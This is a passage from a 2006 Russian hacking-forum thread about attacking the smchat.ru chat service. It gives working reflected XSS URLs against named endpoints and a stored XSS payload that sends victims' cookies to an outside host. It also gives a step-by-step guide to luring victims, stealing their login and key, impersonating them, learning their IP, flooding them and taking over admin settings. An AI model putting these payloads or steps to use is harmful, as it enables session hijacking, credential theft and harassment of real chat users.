ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.03.2006, 14:17
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Вот - http://smchat.ru/chat.php?chatname=Go0oSE"><script>alert(/ok/)</script> пассивная XSS, вот только толку от этого?
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #12  
Старый 30.03.2006, 15:37
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222 %3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #13  
Старый 30.03.2006, 18:42
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

А я вот впендюрил в логин <script>alert() (т.е. скока влезло) и пасс любой... выскакивает ошибка в 364 строчке...
 
Ответить с цитированием

  #14  
Старый 30.03.2006, 22:33
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #15  
Старый 31.03.2006, 00:35
Аватар для izarion
izarion
Новичок
Регистрация: 07.01.2006
Сообщений: 27
Провел на форуме:
73788

Репутация: 2
По умолчанию

Цитата:
Сообщение от Go0o$E  
Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.
Я заметил что при регистрации нужен ключ, так вот ключ не какой нибудь а он зависит от введённого ника
 
Ответить с цитированием

  #16  
Старый 31.03.2006, 01:31
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #17  
Старый 31.03.2006, 02:08
Аватар для izarion
izarion
Новичок
Регистрация: 07.01.2006
Сообщений: 27
Провел на форуме:
73788

Репутация: 2
По умолчанию

Цитата:
Сообщение от Go0o$E  
Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.
Ой ты прям гений! А то я незнал про это! Зацени первую страницу для начала. Что нибудь бы поинерестнее....
 
Ответить с цитированием

  #18  
Старый 31.03.2006, 15:13
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

Может и гений! Что "поинерестнее" тебе надо? Может тебе root там нужен? Что там на первой странице? Там нет cookies которые ты "дёрнуть" хочешь! Там есть логин и ключ! Которых достаточно чтобы зайти в чат или изменить его если ты дернул ключ админа!
Итого:1) Чтобы узнать ip надо создать свой чат и в нем написать /ip [имя жертвы].
2) Чтобы зафлудить его вполне можно использовать "Универсальный чатфлудер" - http://forum.antichat.ru/thread16011.html
3) Стащить "пароль" можно создав свой чат и в настройках->Объявления вставить путь к снифферу и заманить жертву на свой чат.
4) Используя логин и ключ можно зайти в чат под жертвой - http://smchat.ru/chat.php?chatname=[имя чата]&login=[логин]&key=[ключ]
5) Если вы заманили админа одного из чатов можно так же изменить настройки чата - http://smchat.ru/index.php?chatname=[имя чата]&login=[логин]&key=[ключ]
6) Все.
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #19  
Старый 02.04.2006, 12:55
Аватар для izarion
izarion
Новичок
Регистрация: 07.01.2006
Сообщений: 27
Провел на форуме:
73788

Репутация: 2
Post

Цитата:
Сообщение от Go0o$E  
Что там на первой странице?
Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?
Вот что я писал, а про то что там сессия, никто и не спорит, а про поитерестнее я имел ввиду то что там можно сделать автомотическую регистрацию, только как?
 
Ответить с цитированием

  #20  
Старый 04.04.2006, 00:32
Аватар для САМУРАЙ
САМУРАЙ
Новичок
Регистрация: 31.03.2006
Сообщений: 10
Провел на форуме:
10445

Репутация: 0
Cool

Цитата:
Сообщение от Go0o$E  
Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.
Ну ты даёшь..... правда я ничерта не понял про синфер

<script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. ну вот это как я понял долбучая смесь джиэс и тэга вставки изображения , ну ок, ты в этом плане смыслишь больше по этому спорить не буду, но вот КУДА ЭТО СОХРАНЯЕТСЯ ? ГДЕ МНЕ ПОТОМ ИСКАТЬ ЕГО ЛОГИН и КЛЮЧЬ ?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ